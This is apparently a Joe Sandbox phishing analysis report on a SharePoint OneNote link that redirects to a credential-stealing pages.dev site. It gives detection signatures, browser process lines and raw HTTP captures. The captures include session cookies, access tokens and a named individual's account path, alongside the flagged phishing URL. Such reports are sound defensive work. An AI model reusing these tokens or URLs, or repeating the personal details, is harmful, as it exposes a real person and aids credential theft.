Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://insacentre-my.sharepoint.com/:o:/g/personal/christel_chevereau_insa-cvl_fr/EiRzYlzmtGdJoxpcLidnoqABdW_125MBX4mxznGrm93yrA?e=ErmP6W

Overview

General Information

Sample URL:https://insacentre-my.sharepoint.com/:o:/g/personal/christel_chevereau_insa-cvl_fr/EiRzYlzmtGdJoxpcLidnoqABdW_125MBX4mxznGrm93yrA?e=ErmP6W
Analysis ID:715053
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Antivirus detection for URL or domain
Invalid 'forgot password' link found
HTML body contains low number of good links
Invalid T&C link found
No HTML title found

Classification

  • System is w10x64
  • chrome.exe (PID: 5880 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 240 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1788,i,15895415173541107671,4193211191602431059,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • chrome.exe (PID: 6116 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://insacentre-my.sharepoint.com/:o:/g/personal/christel_chevereau_insa-cvl_fr/EiRzYlzmtGdJoxpcLidnoqABdW_125MBX4mxznGrm93yrA?e=ErmP6W MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
79553.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://byzo.pages.dev/SlashNext: Label: Credential Stealing type: Phishing & Social Engineering

    Phishing

    barindex
    Source: Yara matchFile source: 79553.3.pages.csv, type: HTML
    Source: https://byzo.pages.dev/HTTP Parser: Invalid link: Forgot your password?
    Source: https://byzo.pages.dev/HTTP Parser: Number of links: 0
    Source: https://byzo.pages.dev/HTTP Parser: Invalid link: Privacy & Cookies
    Source: https://byzo.pages.dev/HTTP Parser: HTML title missing
    Source: https://byzo.pages.dev/HTTP Parser: No <meta name="author".. found
    Source: https://byzo.pages.dev/HTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
    Source: unknownDNS traffic detected: queries for: insacentre-my.sharepoint.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /:o:/g/personal/christel_chevereau_insa-cvl_fr/EiRzYlzmtGdJoxpcLidnoqABdW_125MBX4mxznGrm93yrA?e=ErmP6W HTTP/1.1Host: insacentre-my.sharepoint.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /personal/christel_chevereau_insa-cvl_fr/_layouts/15/Doc.aspx?sourcedoc=%7B5c627324-b4e6-4967-a31a-5c2e2767a2a0%7D&action=default&slrid=e6036ba0-60ed-5000-3b56-ec6f32cafafb&originalPath=aHR0cHM6Ly9pbnNhY2VudHJlLW15LnNoYXJlcG9pbnQuY29tLzpvOi9nL3BlcnNvbmFsL2NocmlzdGVsX2NoZXZlcmVhdV9pbnNhLWN2bF9mci9FaVJ6WWx6bXRHZEpveHBjTGlkbm9xQUJkV18xMjVNQlg0bXh6bkdybTkzeXJBP3J0aW1lPTNTSGZoa1NsMmtn&cid=b4d974bd-1cf6-430c-b9ae-4dde6b87b7da HTTP/1.1Host: insacentre-my.sharepoint.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEyLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRjMmJkZTNkYzZmMWJkZDkyYjE0NmZlZDdhNmQyNjczYmU2YWJhMzhlODJkYTBmMzc4ZTAzZjgwM2ExNjE2NGMsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YywxMzMwOTI3ODE5NjAwMDAwMDAsMCwxMzMwOTM2NDI5NjUxNjMyOTksMC4wLjAuMCwyNTgsMjJhNzdhYTQtYjFkNS00MDJiLTkxZmItYmI2MThhM2I4YmVhLCwsZTYwMzZiYTAtNjBlZC01MDAwLTNiNTYtZWM2ZjMyY2FmYWZiLGU2MDM2YmEwLTYwZWQtNTAwMC0zYjU2LWVjNmYzMmNhZmFmYixZM20reUttZ0FrdUhLK2xRY1oyUi93LDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCxtaHFjWnNqWUxCRjRjcGo3UDlReDhkdHFmOWVLMlp0d3B5NnNPVjF5OTJockVHVTM2M3pVZ0xLeVI4S0JjK3lpeVkxbmhWQ3EvOTRJbVRlV2pObkpNM3lRM29sUHJpcm1GTGJyTk9JUzZPRnBhNFUrNGV6T0xhMjNLOGdlTUc2Um5pUVVTOFp4YWNtVjJlMWEwNkNmamZ1VmljR1lXNnRZZVREdVlHZnF6Sy8zTFZsQ2dPWlQ1eUdJM2EyK1VTczBuK3BTQk1neFBRLzZzRnEvYW1WTlp3MXNDRHZiaXZzajFsNjQwdFFjV3NVQUJRbnJTUk0rdThJbEljNC9GUDh5QjUrUjJ1RXZYTUlyM21SdGxXTTRmV1l4SzNGeFYxVW8rZTZlb1pVVEhGU25jR1NIUU92NmFhc3g3SjNieEhxTXJPMlVKUXh4V01pSkhXa2hqR292b0E9PTwvU1A+
    Source: global trafficHTTP traffic detected: GET /o/GetImage.ashx?&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffiles%2F924d3cd4da7e4e62a9e70ac99fd2a5dd&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTgiLCJleHAiOiIxNjY0ODQwMjk4IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjkyNGQzY2Q0ZGE3ZTRlNjJhOWU3MGFjOTlmZDJhNWRkO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDs5MDhkNGZlYWIyY2I0OWQwOTQ1ODk3MjdlYWIxYmUxYzs7VHJ1ZTs7OzE2NDUyO2U3MDM2YmEwLTcwNmUtNTAwMC00OThmLTE3NWNlNzI3YWI3ZCJ9%2EsWPE0Mi%5F9gW%5FffKnO8oq5FCtaqaFrdG7m9RJ0kI2OUcIloscTHKr52Bm2bqPxV3nAgOVmnTx98enfDYcjDeDCiTmdpNkLvz5Pnf6VPKkfv%5FbKIs%2Drbd5yUQA2Nrui2Or1BPa4YD%5FgiIPc2IM%2DuPA9Ir6q630GjwzwYZSA75ZPsah0S05fxdYbO409JtCcbuWPm9wxKF6fXuzj4a5BXymEKErX0RGpwF2EMjP87wd6ZCsbyt7Uj%5FZfliEYXMiGslCTbAsKCdwEvxJxgKuM%2DoTxwojbkKFt%2DvdVpF6s4Yko1%5FuP8G1YZ%2DuhEfXO563WQIDix6ogZ4sg4b4dLWXrpm0iw&access_token_ttl=1664840298518&ObjectDataBlobId=%7Bf163baa0-7287-46a8-a69b-124fda05d771%7D%7B1%7D&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&build=16.0.15707.41015&waccluster=GEU2&wdwacuseragent=MSWACONSync&DataUrlEnabled=true HTTP/1.1Host: euc-onenote.officeapps.live.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"haep: 1X-WacFrontEnd: AM1PEPF000094C7X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31sec-ch-ua-mobile: ?0X-OfficeVersion: 16.0.15707.41015X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703X-WacUserAgent: MSWACONSyncUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestX-UserType: WOPIX-xhr: 1X-IsCoauthSession: trueX-WacCluster: GEU2sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-48
    Source: global trafficHTTP traffic detected: GET /o/OneNoteS2SHandler.ashx?action=eduproperties&notebookid=1-5C627324-B4E6-4967-A31A-5C2E2767A2A0&isteacher=false&isstudent=false&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1Host: euc-onenote.officeapps.live.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"X-WacFrontEnd: AM1PEPF000094C7X-OfficeVersion: 16.0.15707.41015X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703X-WacUserAgent: MSWACONSyncX-Requested-With: XMLHttpRequestX-xhr: 1sec-ch-ua-platform: "Windows"haep: 1OrgIdSiteUrl: https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5FfrX-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36X-UserType: WOPIX-IsCoauthSession: trueX-WacCluster: GEU2Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&
    Source: global trafficHTTP traffic detected: GET /afhs/CloudPolicySettings.ashx HTTP/1.1Host: euc-onenote.officeapps.live.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"X-WacFrontEnd: AM1PEPF000094C7X-OfficeVersion: 16.0.15707.41015X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703X-WacUserAgent: MSWACONSyncx-OcpsIsEnabled: trueX-Requested-With: XMLHttpRequestX-xhr: 1x-CacheIsEnabled: falsesec-ch-ua-platform: "Windows"X-IsCoauthSession: truehaep: 1X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQx-LicensingAADIdIsEnabled: falseX-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36x-LicensingIsEnabled: truex-UserDataSignature: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImVPbU15aUItZHhmd2RnV1RuSDdhWkU0VXRNRSJ9.eyJVUE4iOiJ1cm46c3BvOmFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIlBVSUQiOiIiLCJUZW5hbnRJZCI6ImY3NDIxNDUwLWRmMTYtNDcxNC1hZGExLTM5NTM5MGNiOTFkMyIsIkZpbGVUZW5hbnRJZCI6IiIsIklzQ29uc3VtZXJVc2VyIjoiRmFsc2UiLCJJc0Fub255bW91c1VzZXIiOiJUcnVlIiwiSG9zdEVuYWJsZWRGZWF0dXJlcyI6IltdIiwiSXNPMzY1Q29uc3VtZXJIb3N0IjoiRmFsc2UiLCJJc08zNjVDb21tZXJjaWFsSG9zdCI6IlRydWUiLCJVc2VyT2JqZWN0SWQiOiIiLCJMb2NhbFN0b3JhZ2VLZXkiOiJUL1pHU2RtTndCUjljK1FhS01GVENpUnR6WU82TmZpUGQ0aWVqTmtoajVnPSIsImlzcyI6IldBQyIsImV4cCI6MTY2NDgwNTYxNywibmJmIjoxNjY0ODA0Mjk3fQ.EwlIBoEhIM5wyvm5XGu2Uxc6H0_ZS2kaSFQmRw7YYP0YqLRhWnKSwuS7EOILeWpuG5JJ5HG7TV_UEsz8vYOw9MBn5moQ8C8Ywv5n2iDy4F2xj4Isfede8ld1xEEcoXN8rap7floFnz4qxPwt8xCABKRjuGm84wYZ3wzgGe7vjb-cP34sUYMIODpegGb
